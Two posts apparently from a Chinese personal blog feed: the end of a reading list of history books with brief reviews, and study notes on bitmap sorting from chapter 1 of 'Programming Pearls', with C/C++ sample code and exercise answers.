<p> 如果你因为传统教育对历史有一种小恐惧,不妨看一看这套书,小说笔法写就的历史书,有趣亦不失史实。读史真的能够让一个人的胸怀变得很广很广,几百年的兴衰荣辱看过去,你就会觉得你眼前的这些个事就都不是事
一个人真的只是历史长河中很小很小的、及其偶然的存在,你要做的就是做你自己。</p>
<p><strong>4. <a href="http://book.douban.com/subject/25709076/">洪业:清朝开国史</a></strong></p>
<p><img src="/assets/img/booklist/4.jpg" alt="" /></p>
<p> 很巧的是,这本书恰好就是从明末开始介绍到清朝建立、顺治登基这一过程的,对南明也有一些讲述,可以说是承接了《明朝那些事》后续。这本书还是比较学院,从里面的注解就能看出。其实成就任何一番事业都是不容易的,
看看从努尔哈赤到皇太极到顺治是如何成就他们的“洪业”就知道了。</p>
<p><strong>5. <a href="http://book.douban.com/subject/1283178/">追寻现代中国</a></strong></p>
<p><img src="/assets/img/booklist/5.jpg" alt="" /></p>
<p> 这本书是也是洋人研究中国历史的,还不错。据说国外对近代史的研究是从16世纪开始的,也就是从我国的明朝,这本书也是。看完本书对中国近代史会有一个大致的脉络。当然,个人觉得还是1840之后的历史更值得研究,我们是如何一步一步走到现在,都能从近代史中找出自己的思考。</p>
<p><strong>6. <a href="http://book.douban.com/subject/24307937/">东方历史评论</a></strong></p>
<p><img src="/assets/img/booklist/6.jpg" alt="" /></p>
<p> 今年出的历史杂志,至今出了三期,主编是许知远,这个人的八卦我知道的比较少,只知道本科是北大微电子的。这本杂志还是真心不错的,特别是每一期的专题。比如第一期专题是,共和的失败,探讨了清末明初的中国政治走向,读来令人一片唏嘘,忍不住掩卷沉思,如果换一种路,中国今天在何方。</p>
<p><strong>7. <a href="http://book.douban.com/subject/7060185/">江城</a></strong></p>
<p><img src="/assets/img/booklist/7.jpg" alt="" /></p>
<p> 这本书是从阿娇那里介绍过来的,海斯勒的三部曲之首,另外两本是《甲骨文》与《寻路中国》,也非常好看。本书讲的是作者作为了一个来到江边小城涪陵2年教学经历。这本书文字很美,这个确实是要有些水平的。更重要的是,此书从一个外国人角度,记录了中国城市变迁的一个缩影。我觉得涪陵人民还是应该要感谢作者的,他为涪陵留下了一段历史。</p>
<p><strong>8. <a href="http://book.douban.com/subject/23116732/">国会现场</a></strong></p>
<p><img src="/assets/img/booklist/8.jpg" alt="" /></p>
<p> 这本书是讲民初实行宪政时关于国会的。近两年民国热的似乎太泛滥了,不过,民国、近代史确实有太多被误解的地方,值得学者们深入研究。孔子作春秋而乱臣贼子惧,虽然今天早已是礼崩乐坏的时代,很多人的所作所为已不可用无耻形容,但是史家自有记述。我不认同孙中山“军政、训政、宪政”,看了这本书之后,更加觉得无耻的是那些政客,只是一代人有一代人的事情,我们亦不应对他们有太多苛责。</p>
<p><strong>9. <a href="http://book.douban.com/subject/25726537/">小城故事</a></strong></p>
<p><img src="/assets/img/booklist/9.jpg" alt="" /></p>
<p> 作者是李静睿,我们四川自贡的人,跟郭敬明是一个地方的哦。她的文字让人很舒服。其实她之前是一个记者,也是一个对时局有着自己的看法与想法的人。这本书讲的是自贡小城的一些人和事,看的时候自然而然会把自己代入那种川南小城的氛围,简单而又美好,很多能让我回想到小镇的点点滴滴,那些平凡生活,那些或淡或浓的记忆 也仿佛能够看到自己以后的生活,那些注定的疏远,那些无法追溯的美好。</p>
<p><strong>10. 红太阳是怎样升起的</strong></p>
<p> 作者是已故著名学者高华教授。刘瑜貌似说过要读懂中国革命史只要《红太阳是怎样升起的》以及《牛鬼蛇神录》就好了,我觉得真心是这样的。《红》以公开出版的大量史料对延安整风的前后过程进行了深入的分析,据说让体制内能够接触到秘密史料的人都佩服他的对史实的推理。当然,这是一本禁书。</p>
<p> 本来想写几本技术书籍的,奈何今年上半年忙毕设,下半年俗务缠身,大部头的书很多都没有看完,大概有2本书个人觉得还可以的,一本是《APUE》,还有一本是《虚拟机:系统与进程的通用平台》。还有一点想要提及的是这里面不少大部头都是用kindle看的,感觉真是不错,读书神器。</p>
【编程珠玑】第一章2013-12-04T00:00:00+00:00http://terenceli.github.io/%E6%8A%80%E6%9C%AF/2013/12/04/programming-pearls
<p>问题:一个文件最多有n(n=1000w)个正整数,每一个正整数都<n,并且它们是不重复的,如何使用一种快速的方法给这些正整数排序。要求内存最多是1M。</p>
<p>方法一:使用归并排序,归并排序的时间复杂度是nlgn。但是归并排序需要将数据一次全部读入内存,但是很明显需要的内存空间是1000w<em>4/(1024</em>1024),大约是40M,占用空间太大。</p>
<p>方法二:可以将这些正整数分成40组,分别是[0–249999]、[250000–499999]….[9750000–9999999],然后遍历40次这些整数,第一次找出[0–249999]里面的,第二次找出[250000–4999999]里面的。这样每次处理的是250000个数,内存上符合要求,但是时间太多,更何况I/O操作相当费时。</p>
<p>方法三:就是这一章的主题了,位图排序。其基本思想是用1个bit来表示[0–n]中数是否存在,如果存在这个bit置为1,否则置0。这样之后,再遍历一下,就排好序了,这样的使用的空间大致是n/(8*1024*1024)M,1000w大致就是1.25M。例如对于集合{1,2,3,5,8,13},都小于20,假设我们有20个bit,则它的位图表示就是01110100100001000000,再一遍历,就排好了。这种方法的伪代码表示如下:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>for i = [0,n)
bit[i] = 0
for each i in the input file
bit[i] = 1
for i = [0,n)
if bit[i] == 1
write i on the output file
</code></pre></div></div>
<p>实际的代码如下:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>/* Copyright (C) 1999 Lucent Technologies */
/* From 'Programming Pearls' by Jon Bentley */
/* bitsort.c -- bitmap sort from Column 1
* Sort distinct integers in the range [0..N-1]
*/
#include <stdio.h>
#define BITSPERWORD 32
#define SHIFT 5
#define MASK 0x1F
#define N 10000000
int a[1 + N/BITSPERWORD];
void set(int i) { a[i>>SHIFT] |= (1<<(i & MASK)); }
void clr(int i) { a[i>>SHIFT] &= ~(1<<(i & MASK)); }
int test(int i){ return a[i>>SHIFT] & (1<<(i & MASK)); }
int main()
{
int i;
for (i = 0; i < N; i++)
clr(i);
/* Replace above 2 lines with below 3 for word-parallel init
int top = 1 + N/BITSPERWORD;
for (i = 0; i < top; i++)
a[i] = 0;
*/
while (scanf("%d", &i) != EOF)
set(i);
for (i = 0; i < N; i++)
if (test(i))
printf("%d\n", i);
return 0;
}
</code></pre></div></div>
<p>代码没有什么说的,就是需要注意下别人对位图的操作时比较巧妙的。 很明显,位图法的使用时有一些场景的:</p>
<p>1.输入的数需要有一个范围</p>
<p>2.输入的数应该是没有重复,如果重复次数不超过m次,那么lgm个bit来表示1个数</p>
<p><strong>课后问题:</strong></p>
<p>1. 使用库函数排序</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>C语言
/* Copyright (C) 1999 Lucent Technologies */
/* From 'Programming Pearls' by Jon Bentley */
/* qsortints.c -- Sort input set of integers using qsort */
#include <stdio.h>
#include <stdlib.h>
int intcomp(int *x, int *y)
{
return *x - *y;
}
int a[1000000];
int main()
{
int i, n=0;
while (scanf("%d", &a[n]) != EOF)
n++;
qsort(a, n, sizeof(int), intcomp);
for (i = 0; i < n; i++)
printf("%d\n", a[i]);
return 0;
}
C++语言
/* Copyright (C) 1999 Lucent Technologies *//* From 'Programming Pearls' by Jon Bentley */
/* sortints.cpp -- Sort input set of integers using STL set */
#include <iostream>
#include <set>
using namespace std;
int main()
{
set<int> S;
int i;
set<int>::iterator j;
while (cin >> i)
S.insert(i);
for (j = S.begin(); j != S.end(); ++j)
cout << *j << "\n";
return 0;
}
</code></pre></div></div>
<p>2. 位操作</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>#define BITSPERWORD 32
#define SHIFT 5
#define MASK 0x1F
#define N 10000000
int a[1 + N/BITSPERWORD];
void set(int i) { a[i>>SHIFT] |= (1<<(i & MASK)); }
void clr(int i) { a[i>>SHIFT] &= ~(1<<(i & MASK)); }
int test(int i){ return a[i>>SHIFT] & (1<<(i & MASK)); }
</code></pre></div></div>
<p>3. 位图排序与系统排序 位图排序最快,qsort比stl sort快</p>
<p>4. 随机生成[0,n)之间不重复的随机数</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>/* Copyright (C) 1999 Lucent Technologies */
/* From 'Programming Pearls' by Jon Bentley */
/* bitsortgen.c -- gen $1 distinct integers from U[0,$2) */
#include <stdio.h>
#include <stdlib.h>
#include <time.h>
#define MAXN 2000000
int x[MAXN];
int randint(int a, int b)
{
return a + (RAND_MAX * rand() + rand()) % (b + 1 - a);
}
int main(int argc, char *argv[])
{
int i, k, n, t, p;
srand((unsigned) time(NULL));
k = atoi(argv[1]);
n = atoi(argv[2]);
for (i = 0; i < n; i++)
x[i] = i;
for (i = 0; i < k; i++) {
p = randint(i, n-1);
t = x[p]; x[p] = x[i]; x[i] = t;
printf("%d\n", x[i]);
}
return 0;
}
</code></pre></div></div>
<p>5. 最开始实现的需要1.25M,如果内存1M是严格限制的。应该分两次读取,第一次读取0到4999999之间的数,第二次读取5000000到10000000之间的数,这样需要的内存空间约是6.25M。 下面给出july博客中的一个实现:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>#include <iostream>
#include <ctime>
#include <bitset>
using namespace std;
const int max_each_scan = 5000000;
int main()
{
clock_t begin = clock();
bitset<max_each_scan + 1> bitmap;
bitmap.reset();
FILE* fp_unsorted_file = fopen("data.txt","r");
int num;
while(fscanf(fp_unsorted_file,"%d ",&num) != EOF)
{
if (num < max_each_scan)
{
bitmap.set(num,1);
}
}
FILE* fp_sort_file = fopen("sort.txt","w");
for (int i = 0; i < max_each_scan; ++i)
{
if (bitmap[i] == 1)
{
fprintf(fp_sort_file,"%d ",i);
}
}
int result = fseek(fp_unsorted_file,0,SEEK_SET);
if (result)
{
printf("fseek failed\n");
}
else
{
bitmap.reset();
while(fscanf(fp_unsorted_file,"%d ",&num) != EOF)
{
if (num >= max_each_scan && num < 10000000)
{
num -= max_each_scan;
bitmap.set(num,1);
}
}
for (int i = 0; i < max_each_scan; ++i)
{
if (bitmap[i] == 1)
{
fprintf(fp_sort_file, "%d ",i + max_each_scan );
}
}
}
clock_t end = clock();
cout << "位图耗时:" << (end - begin) / CLK_TCK << "s" << endl;
return 0;
}
</code></pre></div></div>
<p>6. 如果每个数据最多出现10次,那么需要4个bit来记录一个数。视内存情况决定使用单次或者多路排序。</p>
<p>7. 程序输入的安全性检验,数据不应超过一次,不应该小于0或者大于n。</p>
<p>8. 如果免费电话号码有800、878、888等,如何查看一个号码是否是免费号码。 暂时只想到这个方法,跟本章思想一样,就是有n个号码就是耗内存1.25M*n。</p>
<p>9. 避免初始化问题 网上google才理解了答案的意思。具体操作是声明两个数组from to以及一个变量top=0;</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>if(from[i] < top && to[from[i]] == i)
{
printf("has used!\n")
}
else
{
a[i] = 1;
from[i] = top;
to[top] = i;
top++;
}
</code></pre></div></div>
<p>top变量用来记录已经初始化过的元素个数,from[i]=top,相当于保持a[i]是第几个初始化过的元素,to[top]=i,用来致命第top个初始化的元素在data里的下标是多少。因此每次访问一个data元素时,判断from[i] < top,即data[i]元素是否被初始化过,但当top很大时,from[i]里被内存随便赋予的初始化值可能真的小于top,这时候我们就还需要to[from[i]] == i 的判断了来保证from[i] < top不是因为内存随意赋给from[i]的值本身就小于top而是初始化后小于的。这个还是要自己理解。</p>
<p>10. 使用电话号码最后两位作为客户的哈希索引,进行分类。</p>